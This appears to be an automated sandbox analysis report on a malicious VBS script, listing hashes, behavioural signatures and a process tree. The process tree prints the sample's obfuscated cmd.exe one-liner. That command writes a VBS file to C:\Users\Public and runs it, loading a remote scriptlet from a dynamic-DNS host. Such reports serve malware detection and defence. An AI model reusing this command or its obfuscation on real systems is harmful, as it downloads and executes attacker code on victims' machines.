Analysis
-
max time kernel
142s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
25/12/2023, 15:14
Static task
static1
Behavioral task
behavioral1
Sample
287e0a96c764aab61c0dfd2469fde185.vbs
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
287e0a96c764aab61c0dfd2469fde185.vbs
Resource
win10v2004-20231215-en
General
-
Target
287e0a96c764aab61c0dfd2469fde185.vbs
-
Size
59KB
-
MD5
287e0a96c764aab61c0dfd2469fde185
-
SHA1
be1fa431415c446bf5b690e62b293fa468f63617
-
SHA256
cb350db86b49a5bf6a2735dd03d6509ac1ca7c80130daa848f9929b531b6e616
-
SHA512
e93dc6819e7b24d033a9717ea1e4b7eb825f19d0700c2ba6146cef63a204f8f4dc5fce9cbf6ff6ff16c8341b3ab88bd56cd45dd6c401489a6b5e56d2a11d163a
-
SSDEEP
768:rtVO9PdrtQpv7UjbW9Ehx6Y4WwmGBC1dRv4P7SivUDwnZnIwuI8Jd:bO9PdrSpvh99Y4WJKP7DGwnZnIwd8Jd
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings cmd.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1860 wrote to memory of 2332 1860 WScript.exe 96 PID 1860 wrote to memory of 2332 1860 WScript.exe 96 PID 2332 wrote to memory of 1680 2332 cmd.exe 95 PID 2332 wrote to memory of 1680 2332 cmd.exe 95 PID 2332 wrote to memory of 4500 2332 cmd.exe 94 PID 2332 wrote to memory of 4500 2332 cmd.exe 94 PID 4500 wrote to memory of 5024 4500 cmd.exe 93 PID 4500 wrote to memory of 5024 4500 cmd.exe 93 PID 5024 wrote to memory of 3240 5024 cmd.exe 97 PID 5024 wrote to memory of 3240 5024 cmd.exe 97
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\287e0a96c764aab61c0dfd2469fde185.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /V/D/c "SEt A4O7=.vb&&SEt q0wd57= rbgq0u48 =qhk53 ^"scqhk53riqhk53ptqhk53:^": i5430j43 =qhk53 ^"hqhk53TtPsqhk53:^": Gqhk53etqhk53Objqhk53ecqhk53t(qhk53rbgq0u48+i5430j43+^"&&sET qhk53=n47076n47076mut4h.gotdns.ch/p2.php^")&&sEt/^p er7b67="%q0wd57:qhk53=%%qhk53:n47076=/%"<nul > C:\Users\Public\^d4120%A4O7%s|start cmd /c start C:\Users\Public\^d4120%A4O7%s"2⤵
- Suspicious use of WriteProcessMemory
PID:2332
-
-
C:\Windows\system32\cmd.execmd /c start C:\Users\Public\d4120.vbs1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\d4120.vbs"2⤵PID:3240
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" start cmd /c start C:\Users\Public\d4120%A4O7%s "1⤵
- Suspicious use of WriteProcessMemory
PID:4500
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt/p er7b67="%q0wd57:qhk53=%%qhk53:n47076=/%" 0<nul 1>C:\Users\Public\d4120%A4O7%s"1⤵PID:1680
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98B
MD5642e2fa68bf257b7c2891abca9e0c994
SHA14e2b917f2dbd6bbc72224edaedaf18bdfea7ba7f
SHA256887469bfc0aae71beed5cde7d40f4c9403ab1bb8c1df4b0e513860c1fa7e8522
SHA512e100bbdc3f9ccf6a634f647169999e66118a31b70f8047cd8c1c8dd0cbd8495bc6f6ab1c62a104dd7e895c2d83e16ab3644797b7bfc7091c66afa46ed232a376